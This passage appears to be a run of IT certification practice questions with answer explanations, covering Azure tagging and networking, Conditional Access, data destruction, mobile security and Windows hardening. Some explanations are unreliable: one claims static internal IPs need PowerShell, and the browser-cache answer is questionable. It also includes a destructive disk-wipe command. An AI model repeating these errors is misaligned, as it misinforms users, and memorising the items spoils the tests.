Understanding the tags and policy applied: VNET1 is in RG6 and has the tag Department: D1 assigned to it. A policy is applied to RG6 that appends the tag Label: Value 1 to all resources within RG6. The tag RGroup: RG6 is applied manually only to RG6, not directly to its resources. Analyzing VNET1’s tags: “Department: D1” is already assigned to VNET1 (this does not change); “Label: Value 1” is added to all resources in RG6 by the policy (so VNET1 receives this tag); “RGroup: RG6” is not inherited by VNET1, because resource group tags do not automatically propagate to the resources within them. Thus, VNET1 has the tags Department: D1 (pre-existing) and Label: Value 1 (added by the policy), so the correct answer for VNET1 is “Department: D1 and Label: Value 1 only”. Analyzing VNET2’s tags: VNET2 is deployed to RG6, where the policy applies. Since VNET2 does not have any pre-existing tags, it receives only the tag added by the policy, “Label: Value 1”.
You have an Azure subscription that contains the resources shown in the following table. To RG6, you apply the tag RGroup: RG6. You deploy a virtual network named VNET2 to RG6. Which tags apply to VNET1 and VNET2? To answer, select the appropriate options in the answer area. VNET2:
None
RGroup: RG6 only
Label: Value 1 only
RGroup: RG6 and Label: Value 1
Understanding the tags and policy applied: VNET2 is deployed in RG6, which has the tag RGroup: RG6. A policy is applied to RG6 that appends the tag Label: Value 1 to all resources within RG6. Resource group (RG6) tags do not automatically propagate to the resources within it unless explicitly inherited by a policy. Analyzing VNET2’s tags: “Label: Value 1” is assigned to all resources in RG6 by the policy (so VNET2 gets this tag), while “RGroup: RG6” is applied only to RG6 itself and is not inherited by VNET2. Thus, VNET2 has only the tag Label: Value 1 (added by the policy).
Your company has two on-premises servers named SRV01 and SRV02. Developers have created an application that runs on SRV01. The application calls a service on SRV02 by IP address. You plan to migrate the application to Azure virtual machines (VMs). You have configured two VMs on a single subnet in an Azure virtual network. You need to configure the two VMs with static internal IP addresses. What should you do?
Run the New-AzureRMVMConfig PowerShell cmdlet
Run the Set-AzureSubnet PowerShell cmdlet
Modify the VM properties in the Azure Management Portal
Modify the IP properties in Windows Network and Sharing Center
Run the Set-AzureStaticVNetIP PowerShell cmdlet
The company has two on-premises servers (SRV01 and SRV02) running an application. The application on SRV01 calls SRV02 using an IP address. The goal is to migrate the application to Azure virtual machines (VMs) while ensuring static internal IP addresses for both VMs. Why Static Internal IPs are Required? In Azure, VMs get dynamic private IP addresses by default. However, since the application calls SRV02 using an IP address, using a dynamic IP could cause connectivity issues when the IP changes. Static private IPs ensure that the application’s configuration remains unchanged after migration. Why Use Set-AzureStaticVNetIP? The Set-AzureStaticVNetIP PowerShell cmdlet assigns a static private IP address to an Azure VM. This cmdlet ensures that the VM retains the assigned private IP address within the virtual network (VNet). This is the correct approach for assigning internal static IPs to Azure VMs. Why Other Options Are Incorrect? New-AzureRMVMConfig (Option A): This cmdlet is used for creating a VM configuration before deployment. It does not assign a static private IP to an already deployed VM. Set-AzureSubnet (Option B): This cmdlet configures subnets in an Azure virtual network but does not set static IPs for VMs. Modifying VM Properties in Azure Portal (Option C): While some VM settings can be changed via the Azure portal, configuring a static internal IP requires PowerShell or Azure CLI. Modifying IP Properties in Windows Network and Sharing Center (Option D): Azure VMs get their private IPs from the VNet DHCP server. Manually setting an IP inside Windows will not work and may cause connectivity issues.
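For reference, the classic (ASM) usage pattern looks roughly like this (service, VM, and IP values are placeholders); in current ARM deployments, the equivalent is setting the NIC's IP configuration allocation method to Static:

# Classic (ASM) model: pin the VM's internal IP inside the virtual network
Get-AzureVM -ServiceName "Service1" -Name "SRV02" |
    Set-AzureStaticVNetIP -IPAddress "10.0.0.5" |
    Update-AzureVM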
You want to implement a Microsoft Entra ID conditional access policy. The policy must be configured to require members of the Global Administrators group to use Multi-Factor Authentication and a Microsoft Entra ID-joined device when they connect to Microsoft Entra ID from untrusted locations. Solution: You access the multi-factor authentication page to alter the user settings. Does the solution meet the goal?
Yes
No
You need to enforce a Conditional Access policy that requires: Global Administrators to use Multi-Factor Authentication (MFA), and access from untrusted locations to require a Microsoft Entra ID-joined device. Why accessing the MFA page to alter user settings does not meet the goal: the Multi-Factor Authentication (MFA) user settings page only allows basic MFA configurations, such as enabling/disabling MFA for individual users, selecting MFA authentication methods (SMS, Authenticator app, etc.), and managing trusted IPs. It does not allow enforcing conditions like requiring Microsoft Entra ID-joined devices or restricting access from untrusted locations. What is the correct approach? You need to create a Conditional Access policy in Microsoft Entra ID with the following settings: Target users: select “Global Administrators”. Conditions: configure “Locations” to target untrusted locations. Access controls: require both Multi-Factor Authentication (MFA) and a Microsoft Entra ID-joined device. Enable policy: set the policy to enforce these rules. Why other methods wouldn’t work: the MFA user settings page (the incorrect approach) only applies basic MFA and does not enforce device compliance or location-based conditions, whereas a Conditional Access policy (the correct approach) allows fine-grained control over MFA, trusted devices, and access locations.
You want to implement a Microsoft Entra ID conditional access policy. The policy must be configured to require members of the Global Administrators group to use Multi-Factor Authentication and a Microsoft Entra ID-joined device when they connect to Microsoft Entra ID from untrusted locations. Solution: You access the Microsoft Entra portal to alter the grant control of the Microsoft Entra ID conditional access policy. Does the solution meet the goal?
Yes
No
You need to implement a Conditional Access policy that enforces: Multi-Factor Authentication (MFA) for Global Administrators. Access from untrusted locations must require a Microsoft Entra ID-joined device. Why Altering the Grant Control in the Microsoft Entra Conditional Access Policy Meets the Goal? Conditional Access policies in Microsoft Entra ID allow administrators to configure fine-grained access control based on: User roles (e.g., Global Administrators). Sign-in conditions (e.g., untrusted locations). Access requirements (e.g., MFA, device compliance, or Microsoft Entra ID-joined devices). Grant controls in Conditional Access policies enforce additional security measures before granting access. Steps to Implement the Correct Conditional Access Policy: Go to Microsoft Entra Admin Center. Navigate to Security > Conditional Access. Create a New Policy: Assignments: select Global Administrators. Conditions: configure Locations to target untrusted locations. Grant Access Controls: require both Multi-Factor Authentication (MFA) and a Microsoft Entra ID-joined device. Enable the Policy and Save. Why This Meets the Goal? By modifying the Grant Controls, you can enforce both MFA and device-based access restrictions for Global Administrators when accessing from untrusted locations. This ensures that the security requirements are met before granting access.
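The same policy can also be created programmatically. The following is only a sketch using the Microsoft Graph PowerShell SDK; the role template ID shown is the commonly documented one for Global Administrator, and the location and control values should be verified against your own tenant before use:

```powershell
# Requires: Install-Module Microsoft.Graph and an account allowed to manage Conditional Access.
Connect-MgGraph -Scopes "Policy.ReadWrite.ConditionalAccess"

$policy = @{
    displayName   = "GA: MFA + Entra-joined device from untrusted locations"
    state         = "enabled"
    conditions    = @{
        applications = @{ includeApplications = @("All") }
        users        = @{ includeRoles = @("62e90394-69f5-4237-9190-012177145e10") }  # Global Administrator role template ID
        locations    = @{ includeLocations = @("All"); excludeLocations = @("AllTrusted") }
    }
    grantControls = @{
        operator        = "AND"                          # require every listed control
        builtInControls = @("mfa", "domainJoinedDevice")
    }
}

New-MgIdentityConditionalAccessPolicy -BodyParameter $policy
```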
The employees at your company have to fill out and manually sign personnel documents. Paper copies of the signed documents are no longer needed after they have been scanned into a system. How should the paper documents be handled?
Place them in the trash.
Place them in the recycle bin.
Keep them in a locked cabinet.
Shred them.
When paper documents contain sensitive or personal information, such as signed personnel records, they should be shredded before disposal to prevent unauthorized access or identity theft. Shredding ensures the documents are destroyed and cannot be reconstructed or read by anyone after disposal. Throwing them in the trash or recycle bin—even if the information has been scanned—poses a security risk, and keeping them in a locked cabinet is unnecessary if digital copies are already stored securely.
You need to dispose of some outdated magnetic hard drives. What is the practice of clearing the data from a hard drive with a large magnet?
Zero writing
Overwriting
Degaussing
Incineration
Degaussing is the process of erasing data from a magnetic hard drive using a powerful magnet or electromagnetic field. This method disrupts the magnetic domains on the platters that store data, rendering the drive unreadable and unrecoverable. It is a fast and effective way to destroy data on magnetic storage devices, but it renders the drive unusable afterward, meaning it cannot be reused or resold.
You want to donate some old drives to a nonprofit organization. What should you use to set the drive’s data to be nothing but 0s (zeros)?
Format command
Drive-wiping software
Incinerating
Degaussing
When donating old drives, it’s critical to securely erase all data to protect sensitive information. Drive-wiping software (also known as data sanitization or disk erasure tools) securely overwrites all existing data — often replacing it with zeros (0s) — multiple times to ensure it’s not recoverable. Unlike the standard format command, which may leave data recoverable, drive-wiping software meets data sanitization standards like DoD 5220.22-M or NIST 800-88. Examples of drive-wiping software include: DBAN (Darik’s Boot and Nuke) Eraser CCleaner Drive Wiper
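As one illustration of a zero-fill using tools built into Windows (assuming the drive is still functional and attached as, say, disk 2), diskpart’s clean all command overwrites every sector with zeros; dedicated wiping tools do the same thing but add multi-pass options and verification reports:

```powershell
# DESTRUCTIVE: run from an elevated prompt and confirm the disk number with "list disk" first.
# Disk 2 is only an example.
"select disk 2", "clean all" | Set-Content -Path .\wipe-disk.txt
diskpart /s .\wipe-disk.txt    # "clean all" writes zeros to every sector on the selected disk
```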
You are a contractor for a government entity. What is the best way to provide proof of data destruction when decommissioning old hard drives and computers?
Have the recycling center give you a receipt for the drives.
Hire a third-party vendor to do the destruction and provide a certificate of destruction and recycling.
Zero-write all the drives.
Destroy them within your company and show pictures of the destroyed drives.
When working as a contractor for a government entity, strict data handling and disposal protocols must be followed. The best way to provide official proof of data destruction is to: Use a certified third-party vendor that specializes in secure data destruction. Obtain a certificate of destruction, which formally documents that the hardware was destroyed in compliance with relevant laws, policies, and standards (such as NIST 800-88). Often, this includes recycling compliance documentation, which is important for environmental and regulatory purposes. This method ensures legal protection, traceability, and compliance with government data handling standards.
A user finds a new video card driver for his HP laptop on the HP site. What is the HP site an example of?
A trusted software source.
An untrusted software source.
An authenticator website.
Part of an access control list.
The HP website is a trusted software source because it is the official website of the company that manufactures the laptop (HP). When a user downloads software, drivers, or updates directly from the manufacturer’s official website, such as HP in this case, it is considered trusted because: Authenticity: HP is the legitimate source, ensuring that the drivers and software are authentic and specifically designed for your HP laptop model. Safety: Software from official sources is usually tested for security and functionality, reducing the risk of malware, viruses, or other security threats. Updates: HP will provide the most recent and compatible drivers that work with their hardware, ensuring the proper functioning of the laptop. Why the other options are incorrect: An untrusted software source: This would refer to downloading software from unofficial, third-party websites, which could potentially contain malicious software or incompatible drivers. In this case, since the source is HP’s own website, it’s not untrusted. An authenticator website: An authenticator website is typically used for verifying user identity (e.g., for two-factor authentication or managing credentials), not for downloading software or drivers. Part of an access control list: An access control list (ACL) is used to define permissions and control access to resources on a network or system. It is unrelated to the context of downloading drivers or software. Conclusion: The HP website is a trusted software source because it is the official, verified site from which you can safely download software and drivers for your HP laptop.
A network administrator recommends performing a low-level format to dispose of used hard drives. What distinguishes a low-level format from a standard format?
A modern low-level format fills the entire drive with zeros, returning it to factory mode. A standard format creates the file allocation table and root directory.
Standard formats are performed at the factory, and low-level formats are performed using the format command.
A standard format records the tracks and marks the start of each sector on each track. A low-level format creates the file allocation table and root directory.
Low-level formats are performed at the factory, and standard formats are performed using the format command.
This answer reflects the modern interpretation of “low-level format” commonly used today in data destruction contexts: A modern low-level format (often referred to as a zero-fill or secure erase) overwrites the entire disk with zeros or random data, effectively wiping all existing data and returning the drive to a factory-like state. It’s a secure way to remove data before disposal or reuse, making recovery extremely difficult. A standard format, such as the one run by the format command, does not completely erase all data. Instead, it deletes file system structures like the file allocation table (FAT) or master file table (MFT), which makes the data appear gone, but the actual files may still be recoverable using special software. This distinction is important when securely disposing of drives containing sensitive or confidential data.
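A quick illustration of the difference from the command line (the drive letter is a placeholder):

```powershell
# Quick format: rebuilds the file system structures only; old data remains recoverable.
format E: /FS:NTFS /Q

# Full format (Windows Vista and later): also zero-fills the whole volume.
# /P:2 is documented as adding extra overwrite passes on top of the zero fill.
format E: /FS:NTFS /P:2
```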
You take numerous old hard drives that contained private information to a local company for destruction. The IT director requires proof that the drives were destroyed properly. What should you give him?
Hard drive fragments.
A certificate of destruction.
Photos of the destroyed hard drives.
A notarized letter from the disposal company.
A certificate of destruction is the official document provided by a certified data destruction company that verifies the hard drives were destroyed in compliance with data protection standards and regulations. It typically includes: The date of destruction The method of destruction used A list of serial numbers or asset tags of the destroyed devices The name of the company that performed the destruction This certificate serves as legal proof that your organization took the proper steps to securely dispose of sensitive data, helping meet compliance requirements like HIPAA, GDPR, or industry-specific security standards.
Your company has made the decision to permit employees to do company business using their own devices. The company will spend less on hardware as a result of this decision. Employees must sign an agreement with the company to use their personal devices. What is the name of this agreement?
Cell phone policy
MDM policy
Remote work policy
BYOD policy
BYOD stands for Bring Your Own Device. A BYOD policy is a formal agreement that allows employees to use their personal devices—such as smartphones, tablets, or laptops—for work-related activities. This policy outlines: What devices are permitted Security requirements (such as encryption and passcodes) The company’s rights regarding data access, monitoring, and remote wiping Employee responsibilities regarding acceptable use and data protection The main goal is to balance cost savings with security and compliance, ensuring that company data remains protected even on personal hardware.
Your new smartphone has a camera that allows you to authorize a transaction by merely looking at it. What is the name of this technology?
Pin code
Facial recognition
Fingerprint scanner
Device encryption
The technology that allows you to authorize a transaction by merely looking at your smartphone is facial recognition. This biometric authentication method uses the device’s camera to scan and recognize your face to verify your identity and grant access or authorize actions like payments or unlocking the device. Why the other options are incorrect: Pin code: Requires you to manually enter a numeric code, not facial recognition. Fingerprint scanner: Uses a fingerprint, not a face, to authenticate. Device encryption: Protects data stored on the device but doesn’t perform authentication by itself.
Your iPhone has been stolen. What should you do to make sure the thief cannot access your data?
Perform a remote backup.
Perform a remote wipe.
Enable BitLocker.
Enable full-device encryption.
When your iPhone is stolen, the best course of action is to perform a remote wipe using Find My iPhone (via iCloud or the Find My app). This action will remotely erase all data from your device, making it impossible for the thief to access your personal information. Why the other options are not correct: Perform a remote backup: This would save your data, but it doesn’t protect the stolen phone’s data from being accessed. Enable BitLocker: BitLocker is for encrypting drives on Windows devices, not for iPhones. Enable full-device encryption: While this is a good security measure to have enabled before the phone is stolen, it doesn’t help after the phone is lost. Remote wipe is necessary to immediately erase the data.
What is the least secure way to unlock a locked screen on a mobile device?
Pattern
Swipe
Facial recognition
PIN code
The swipe method is the least secure way to unlock a mobile device because it involves simply swiping the screen without requiring any form of authentication. There are no personal identifiers, passwords, or biometrics involved, making it easy for someone to access the device if it is left unattended. Why the others are more secure: Pattern: Requires drawing a specific shape, which is harder to guess than a swipe but still vulnerable to smudge attacks. Facial recognition: Uses biometric data to identify the user, providing a higher level of security. PIN code: Requires entering a specific number, which, although less secure than biometrics, is still more secure than a swipe.
You read company email on your smartphone. You want to prevent people from accessing your phone if you leave it somewhere. What is the first security layer you should put in place to prevent unauthorized access to your phone?
Remote wipe software
Screen lock
Multifactor authentication
Full-device encryption
The first security layer to protect your smartphone from unauthorized access is enabling a screen lock. This ensures that anyone who picks up your phone can’t access its contents without the correct PIN, password, pattern, fingerprint, or facial recognition. Why the others are important but not the first layer: Remote wipe software: Useful if the phone is lost or stolen, but doesn’t prevent initial access. Multifactor authentication: Protects individual apps or services, not the device itself. Full-device encryption: Secures stored data, but still requires a lock screen to prevent immediate access.
Which mobile device security method calls for entering a string of numbers?
Pattern
Facial recognition
Fingerprint scanner
PIN code
A PIN code (Personal Identification Number) is a string of numbers—usually 4 to 6 digits—used to unlock a mobile device or authenticate access. It’s a numeric alternative to passwords and is commonly used on phones and tablets for quick access. Why the others are incorrect: Pattern: Involves drawing a shape or path on a grid. Facial recognition: Uses the device’s camera to identify your face. Fingerprint scanner: Uses your fingerprint as a biometric identifier.
You’re connecting to your company’s network from home utilizing a digital security method. This security technique encrypts data before transferring it over a public network (the Internet), and your connection receives a corporate IP address much as you would if you were physically present in the workplace. What is this type of connection?
VPN
EFS
Firewall
BitLocker
A VPN (Virtual Private Network) is a technology that allows users to securely connect to a remote network, such as a company’s internal network, over the internet. It encrypts the data traffic, ensuring that the data being sent over a public network (like the internet) is secure and protected from potential eavesdropping or tampering. Encryption: The VPN encrypts data before sending it over the internet, which makes it secure and private. This means that any sensitive information, such as login credentials or corporate files, remains safe from unauthorized access. Corporate IP Address: When you connect to a company’s network through a VPN, your connection is assigned an internal corporate IP address, just like you would have if you were physically in the office. This allows you to access internal resources such as shared drives, intranet sites, and company applications as if you were on-site. Why the other options are incorrect: EFS (Encrypting File System): EFS is a file-level encryption feature for protecting data on individual files and folders, but it doesn’t provide a secure connection for accessing a network remotely. Firewall: A firewall is a security system that monitors and controls incoming and outgoing network traffic. It doesn’t directly provide secure remote access; it’s more focused on blocking unauthorized access. BitLocker: BitLocker is a full-disk encryption tool that protects data stored on a device. While it secures data on the local machine, it does not create a secure connection over a public network. Conclusion: A VPN is the correct method for securely connecting to your company’s network from a remote location, providing encryption and assigning a corporate IP address just as if you were on-site.
What is the method of logging into a mobile device in which someone can easily figure out your password using marks that your skin’s oils have left behind?
Facial recognition
Swipe
Fingerprint
Pattern
When using a pattern to unlock a mobile device, users often draw the same shape repeatedly on the screen. Over time, oils from the skin can leave visible smudge marks that reveal the pattern, especially under certain lighting. This makes it easier for someone to guess the unlock pattern just by observing the screen. Why the others are incorrect: Facial recognition: Biometric; no touch involved. Swipe: Not password-based; it’s a simple gesture without security. Fingerprint: Also biometric and does not involve drawing or repeated visible patterns on the screen.
To unlock your iPhone, you must enter a passcode. You want to configure your phone so that all data is deleted if the wrong passcode is entered 10 times in a row due to recent phone thefts around your office. Which feature enables you to do this?
Remote wipes
Screen locks
Failed login attempts restrictions.
Locator applications
The feature that automatically deletes all data after 10 incorrect passcode attempts on an iPhone is called “Failed login attempts restrictions”. This security setting is found under: Settings > Face ID & Passcode (or Touch ID & Passcode) > Erase Data (toggle ON) When enabled, the iPhone will erase all its data after 10 consecutive failed passcode attempts, which helps protect sensitive information in case the device is stolen. Why the other options are not correct for this function: Remote wipes: Allow you to erase the device manually from another device or using iCloud, but do not happen automatically after failed attempts. Screen locks: Simply prevent access without wiping data. Locator applications: Help you track or lock your device remotely but don’t automatically wipe data after failed passcode entries.
Your mobile device disappeared after you briefly turned your back in the coffee shop. Which method does not allow you to remotely wipe data on a mobile device?
Using MDM software.
Using Google Find My Device or Find iPhone app.
Disabling guest access.
Exceeding failed login restrictions.
Disabling guest access helps restrict unauthorized use of a device locally, but it does not provide any remote wipe capability if the device is lost or stolen. It’s a preventive measure, not a recovery or remote action tool. The other options do allow remote wiping: Using MDM (Mobile Device Management) software: Admins can remotely lock or wipe corporate devices through an MDM platform. Using Google Find My Device or Find iPhone app: These services allow users to locate, lock, and erase a lost device remotely. Exceeding failed login restrictions: On some devices, you can configure a setting to automatically wipe the device after a set number of failed login attempts. Key takeaway: To protect your data if a device is stolen, rely on tools like MDM or remote tracking apps, not local account settings like guest access.
What is a biometric authentication method that is most frequently used with mobile devices?
DNA lock
Fingerprint scan
Retina scan
Swipe lock
The most frequently used biometric authentication method on mobile devices is the fingerprint scan. It is: Fast and convenient for users. Widely supported on both Android and iOS devices. Reliable for unlocking phones, approving app installations, and authorizing payments. Why the other options are incorrect: DNA lock: Not a real or practical authentication method for mobile devices at this time. Retina scan: Though secure, it is less commonly used due to the need for specialized and expensive hardware. Swipe lock: Not a biometric method—it’s a basic screen lock gesture without actual identity verification. Key takeaway: Fingerprint scans balance security and convenience, making them the most commonly used biometric method on smartphones and tablets.
What is NOT a method to keep your mobile device secure?
Accept and install OS updates as soon as possible.
Use a remote backup application to safeguard your data in the event that you must wipe your phone.
Use a swipe to unlock a mobile device.
Install antivirus/anti-malware.
Using a swipe to unlock a mobile device is not a secure method of protection because it provides no authentication — anyone who picks up the device can unlock it instantly. This method doesn’t protect your personal information, emails, messages, or access to apps and accounts. Why the other options are secure methods: Accept and install OS updates as soon as possible: Updates often include security patches that fix vulnerabilities. Delaying updates can leave your device exposed to threats. Use a remote backup application: Backing up your data ensures that if your phone is lost, stolen, or needs to be wiped, you can recover important files and settings. Install antivirus/anti-malware: These tools help protect your device from malicious apps, websites, and downloads, reducing the risk of data breaches or infections. Key takeaway: For better security, always use strong authentication methods (like PIN, password, facial recognition, or fingerprint), not simple swipes.
You and your family members own various mobile devices, such as phones, laptops, and smart watches. It would be convenient to have a simple way to locate a phone, because people frequently forget where they put it or it may be stolen. You also want to know where other family members are when they are around town. What kind of app will let you do that?
Remote control app
Firewall app
Locator app
Trusted source app
A locator app is specifically designed to track the location of mobile devices such as phones, laptops, and smartwatches. These apps use GPS, Wi-Fi, and cellular data to provide real-time location information. They are ideal for: Finding lost or stolen devices (e.g., “Find My iPhone” for Apple devices or “Find My Device” for Android). Tracking the location of family members for safety and convenience. Some popular examples include: Apple’s Find My (for iPhones, iPads, and Apple Watches) Google’s Find My Device (for Android phones and tablets) Life360 (for family location sharing and tracking) Why the other options are incorrect: Remote control app: Allows you to control another device remotely (like a TV or computer), but not typically used for tracking location. Firewall app: Protects your device from unauthorized network traffic but has no tracking capability. Trusted source app: This isn’t a specific type of app—it refers more to the origin of an app (i.e., downloading from a secure source), not its function. Key takeaway: Use a locator app to track devices and family members’ locations conveniently and securely.
A dozen Windows workstations are part of the network you manage. To prevent users from booting to an unauthorized device, you should make sure they cannot change the boot order. What should you do?
Enable a strong password policy.
Set a BIOS/UEFI password.
Disable Autorun.
Restrict user permissions.
To prevent users from changing the boot order and booting to an unauthorized device (such as a USB drive or external hard drive), the best approach is to set a BIOS/UEFI password. This password will restrict unauthorized access to the system’s BIOS/UEFI settings, where users can change the boot order. By enforcing this password, only authorized users (such as administrators) will be able to modify the system’s boot settings, ensuring that devices like USB drives cannot be used to boot an operating system or exploit vulnerabilities. Why the other options are less effective: Enable a strong password policy: While a strong password policy helps with user account security, it does not directly affect the BIOS/UEFI settings or prevent users from altering the boot order. A password policy governs user logins, not hardware or system settings. Disable Autorun: Disabling Autorun helps prevent unauthorized programs or malware from automatically running when a device is connected (like a USB drive). However, it doesn’t prevent a user from booting from an unauthorized device in the first place. Setting a BIOS/UEFI password is a more direct way to secure the boot process. Restrict user permissions: Restricting user permissions on the operating system level (Windows) ensures that users cannot perform unauthorized actions within the OS, but it does not control the boot process or prevent users from accessing the BIOS/UEFI settings to change the boot order. BIOS/UEFI security settings are separate from OS-level permissions. Key Takeaway: The best way to ensure that users cannot change the boot order is to set a BIOS/UEFI password, which secures the hardware configuration settings and prevents unauthorized booting from external devices.
You are using your desktop computer to browse a web page you frequently visit. You know the website has been updated, but the changes aren’t appearing on your computer. When you use another device to access the website, it looks different. What are the TWO things you can do to force the website to update on your computer?
Hold the Ctrl key and F5 key simultaneously while on the website.
Clear the browser’s cache.
Clear the browser’s stored cookies.
Uninstall and reinstall your browser.
Clear the browser’s cache: The cache stores temporary files like images, scripts, and stylesheets from websites you’ve visited, which helps improve loading times. However, when a website is updated but your browser is still showing the old version from the cache, clearing the cache forces the browser to request the updated version of the website from the server. Clear the browser’s stored cookies: Cookies are small pieces of data stored by the browser, typically used for storing login credentials, user preferences, or tracking information. Sometimes outdated cookies can cause issues where the website might not display the latest content (such as showing old session information or cached data tied to user sessions). By clearing cookies, you remove these stored values, which might allow the website to load the latest version of its content, particularly if the website is user-specific or session-dependent. Why the other options are incorrect: Hold the Ctrl Key and F5 key simultaneously: While this does perform a “hard refresh” and can clear the cache for that page temporarily, it does not necessarily remove all cached data or cookies. It’s a quick way to force a reload of the page, but it doesn’t have the same effect as clearing both the cache and cookies, which are more thorough methods of ensuring the most up-to-date content. Uninstall and reinstall your browser: This step would clear all of your settings and browsing data but is unnecessary for simply updating the website content. This action is much more drastic than clearing just the cache and cookies, which are the more targeted solutions for this problem. Conclusion: To force a website to update on your computer, clearing both the browser’s cache and cookies ensures that all outdated data is removed, forcing the browser to load the most recent version of the website.
A Windows workstation has been added to a workgroup. What are the two best practices for maximizing security of the Administrator account?
Disable the Administrator account.
Rename the Administrator account.
Remove the Administrator account from the Administrators group.
Require a strong password.
Rename the Administrator account: By default, Windows has an Administrator account that is well-known and targeted by attackers. Renaming this account helps obscure its identity, making it harder for attackers to exploit it in a brute-force attack or other attack vectors. It’s one of the first steps in improving security, as it reduces the chance of an attacker guessing the account name. Require a strong password: A strong password is a fundamental security best practice. The Administrator account is highly privileged, and using a strong, complex password (with a combination of upper and lowercase letters, numbers, and special characters) helps prevent unauthorized access. Weak or easily guessable passwords make it much easier for attackers to gain control of the system. Why the other options are less effective: Disable the Administrator account: Disabling the Administrator account can create issues for legitimate administrative tasks. While it is a security measure to disable unused accounts, completely disabling the Administrator account is not ideal because it can complicate recovery or system maintenance. Instead, it’s better to rename it and set a strong password, so it remains secure but functional when needed. Remove the Administrator account from the Administrators group: The Administrator account is a critical account that is required for performing administrative functions. Removing it from the Administrators group would prevent legitimate administrative actions from being performed, and it would likely cause operational problems. It’s more important to secure the account with a strong password and rename it. Key Takeaway: To maximize security for the Administrator account in a workgroup, you should rename the account to obscure it from attackers and require a strong password to prevent unauthorized access.
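As a rough sketch, both steps can be scripted with the built-in LocalAccounts cmdlets from an elevated prompt (the new account name below is just an example):

```powershell
# Rename the well-known built-in account so it is no longer an obvious target...
Rename-LocalUser -Name "Administrator" -NewName "Ops-Admin42"

# ...then set a strong password, prompted for securely rather than typed in plain text.
Set-LocalUser -Name "Ops-Admin42" -Password (Read-Host -AsSecureString "New admin password")
```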
You work in a secure environment. Although network-wide data encryption has been implemented, you wish to encrypt all the data on users’ storage drives, including laptop drives, to stop information from being shared in the event that the drives are compromised or stolen. What is NOT a good way to encrypt this data-at-rest?
Use EFS and let the employee choose what to encrypt.
Use a third-party encryption solution.
Use MDM software.
Use BitLocker on desktop systems.
While EFS (Encrypting File System) is a tool available in Windows to encrypt individual files or folders, it is not ideal for encrypting all data-at-rest on a user’s storage drive, especially in a secure environment where consistency and centralized control are crucial. Allowing users to choose what to encrypt could lead to inconsistent encryption practices and gaps in security, particularly if some files or folders are not encrypted properly. Additionally, EFS only encrypts files that are stored locally on the device, and it may not provide sufficient protection if the user doesn’t apply it properly. Why the other options are better: Use a third-party encryption solution: A reputable third-party encryption solution can provide full disk encryption (FDE), which ensures that all data on the device (including system files) is encrypted automatically. This method is more comprehensive and consistent, especially for mobile devices like laptops, which may be more prone to theft or compromise. Use MDM software: Mobile Device Management (MDM) software can enforce security policies, including enabling full disk encryption on devices. It allows IT administrators to centrally manage encryption settings and ensure all devices are properly encrypted, reducing the risk of data exposure from stolen or compromised devices. Use BitLocker on desktop systems: BitLocker is a full disk encryption tool built into Windows Pro and Enterprise editions. It provides strong encryption for all data on the disk, including system files and user data, and it can be centrally managed in a corporate environment, making it an excellent solution for encrypting data-at-rest. Key Takeaway: For better security and compliance in a secure environment, it’s important to use full disk encryption solutions like BitLocker or third-party tools, rather than relying on user-controlled encryption like EFS, which might be incomplete or inconsistent.
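For the BitLocker option, here is a minimal sketch of enabling full disk encryption on the system drive with the built-in cmdlets (it assumes a TPM is present; the parameters should be adapted to your environment or pushed out centrally via Group Policy or MDM):

```powershell
# Encrypt the OS volume using the TPM as the key protector.
Enable-BitLocker -MountPoint "C:" -EncryptionMethod XtsAes256 -TpmProtector

# Add a recovery password protector and confirm the encryption status.
Add-BitLockerKeyProtector -MountPoint "C:" -RecoveryPasswordProtector
Get-BitLockerVolume -MountPoint "C:"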
When adding new users to your network, make sure to inform them that their user passwords must meet complexity requirements and be changed the first time they log in. According to password best practices, what is INCORRECT?
At least one of each of these should be used: upper- and lowercase letters, numbers, and special characters.
Passwords that are four characters long are okay if they are complex.
Longer passwords are better.
Password minimum length is eight characters.
According to password best practices, the minimum length for passwords should generally be at least 8 characters, and complexity should be enforced. While it is true that a complex password (with a mix of upper and lowercase letters, numbers, and special characters) increases the security of a password, a password of only 4 characters—even if it meets complexity requirements—is still considered weak. Why the other options are correct: At least one of each of these should be used: upper- and lowercase letters, numbers, and special characters: This is a key best practice for password complexity. Requiring a mix of character types makes it significantly harder for attackers to guess or crack the password using methods like brute force or dictionary attacks. Longer passwords are better: Longer passwords provide a better security foundation, as they increase the number of possible combinations and make it much more difficult for attackers to crack through methods like brute force. Generally, the longer and more complex the password, the stronger the security. Password minimum length is eight characters: Setting a minimum length of eight characters is a standard best practice. Shorter passwords are generally easier to crack, and eight characters is considered the minimum threshold for sufficient complexity. Key Takeaway: A password that is only 4 characters long, even if it meets complexity requirements, is not secure enough. Best practices recommend a minimum of 8 characters for passwords, with added complexity to make them harder to crack.
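To make the “longer is better” point concrete, here is a quick back-of-the-envelope comparison, assuming all 95 printable ASCII characters are allowed in each position:

```powershell
# 4 characters: about 81 million combinations - trivial for modern cracking hardware.
[math]::Pow(95, 4)     # 81,450,625

# 12 characters: roughly 5.4 x 10^23 combinations - impractical to brute-force.
[math]::Pow(95, 12)
```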
What should you do to prevent a potential hacker from booting to a USB drive on a Windows workstation?
Require strong Windows passwords.
Change the default administrator password.
Restrict with user permissions.
Set a BIOS/UEFI password.
Setting a BIOS/UEFI password is the most effective way to prevent a potential hacker from booting a Windows workstation from a USB drive or any other external media. The BIOS/UEFI password restricts access to the system’s boot settings, preventing unauthorized users from changing the boot order (e.g., setting USB as the first boot device) and ensuring that only authorized users can boot from the internal hard drive or approved devices. Why the other options are less effective for this purpose: Require strong Windows passwords: While strong passwords are essential for protecting user accounts within the operating system, they do not prevent an attacker from altering the system’s boot order at the BIOS/UEFI level. A hacker could still boot from external media (e.g., USB) to bypass the operating system password. Change the default administrator password: Changing the default administrator password helps protect the system from unauthorized access once it’s booted into Windows, but it does not stop someone from modifying the system’s boot sequence or bypassing the OS login screen through external boot devices. Restrict with user permissions: User permissions control access to files and resources within the operating system, but they do not affect the BIOS/UEFI boot settings. An attacker with physical access to the machine can still change the boot order and potentially bypass security measures. Key Takeaway: To prevent unauthorized access via external boot devices like USB drives, you should set a BIOS/UEFI password, which ensures that only authorized users can change boot options or boot from external media.
Your company’s employees work on extremely confidential projects. Every employee has been told to lock their screens anytime they leave their computers, even for a brief period of time. What key sequence will lock their desktop right away and require a password to reenter it?
Windows Key+Right Arrow
Windows Key+D
Windows Key+X
Windows Key+L
